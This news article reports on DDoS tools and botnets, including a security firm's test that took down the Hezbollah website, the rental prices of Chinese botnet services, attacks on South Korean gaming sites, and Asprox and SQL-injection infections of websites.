Virtual battleground attacks Hezbollah's soft underbelly
Software used to take down Web sites is more accessible and dangerous than ever before.
Last week, while trying out breaking-in tools developed by Chinese hackers, an Israeli Network security company, Applicure, brought down the Hezbollah Web site (hizbollah.tv), using no more than 10 bots, which are computers controlled by hackers.
Reports of hackers taking out Web sites by bombarding them with massive amounts of information commonly appear in the news media. But often it's hard to estimate both the magnitude of the phenomenon and the ease with which even laymen can use existing web tools.
Those attacks geared at bringing down Web sites are know as either denial of service attacks (DOS) or distributed denial of service attacks (DDOS), and make use of Botnet networks - large networks of unsuspecting computer users hijacked by hackers with viruses and Trojan horses. According to Chinese CERT (Computer Emergency Response Team), the threat on China's internal network has multiplied by 20 in 2007.
One of the most surprising things about the software used in order to take down the Lebanese militant organization's site is its interface, which is light years away from the common image of hackers dealing with complex code. The interface is very accessible and is clearly meant for everyday users, as opposed to veteran programmers.
The software enables a choice of attack possibilities, attack speed, and the number of computers the attackers wish to use in order to bring down the Web site's servers.
Applicure's South Korean partners say the price of using the software of the kind that brought down the Hezbollah site starts at about $260 a year, when using a small number of bots. Having 1,000 bots at your disposal can bring the price up to $100 a month.
The hacker, or group of hackers, who created the software refused to speak to Haaretz. But the amounts of money these hackers can make were made public in Scott Henderson's blog specializing in Chinese hackers, Darkvisitor.com. According to that report, a virus writer can make up to a million Yuan, or $150,000 a year, while a virus-spreading group can reach an income of about $1.5 million a year.
Applicure's interest in South Korea is no accident. When the company offered the free version of the software an especially high number of downloaders originated from South Korea. The picture became clear after Haaretz contacted some of the downloaders: South Korea is a favorite target of the Chinese hackers due to a highly developed internet network, the kind Israel can only dream of, allowing surf-speeds of around 40 megabytes per-second in an average household connection. Online games, which turn in large amounts of money, are a highly developed industry in Asia in general, and in South Korea specifically.
Security expert Raviv Raz, who recently returned from South Korea where he also visited the labs of the National Center for Information Security, says that often the attacks' purpose is blackmail. "When a company which specializes in online gaming has its lines cut, a huge loss follows. Even if it's only for one day," he said.
So, South Korea has become a kind of internet equivalent of a canary in a coal mine. Just as canaries served as a kind of sensor, warning against a lack of oxygen or the presence of toxic gasses, so South Korea serves as a warning sensor against hacker attacks.
In the West, casino sites are the worst hit by attacks, carried out with some unfamiliar nuances added to familiar breaking-in software, the most famous of which is Asprox. The purpose of these programs is to infect as many users as possible with Trojan horses which were meant for one aim: To search for number sequences which look like credit card numbers, or major bank account numbers, in every file and steal them.
Along the way Trojan horses can be fitted with all kinds of extras, from spying on keyboarding to peeing into the webcam.
According to Raz the bots use SQL injection or, in other words, they inject a malicious code into the most legitimate sites conceivable. For example, one of the more well-known break-ins took place last year against the Chinese Yahoo.
David Alush adds: "It's an automatic intrusion into the Web site's database. The virus checks the entire site, and if that database is linked to dozens more sites, then those are corrupted as well." In other words, all the parts of all of the Web sites will include the malicious code that will continue to try and download itself to user's commuters.
Both Alush and Raz speak of an exponential growth in the number of infected Web sites, with different reports on the growth of Chinese bot networks affirming that approximation. According to the report, China was second only to the U.S. in the number of bot-induced attacks.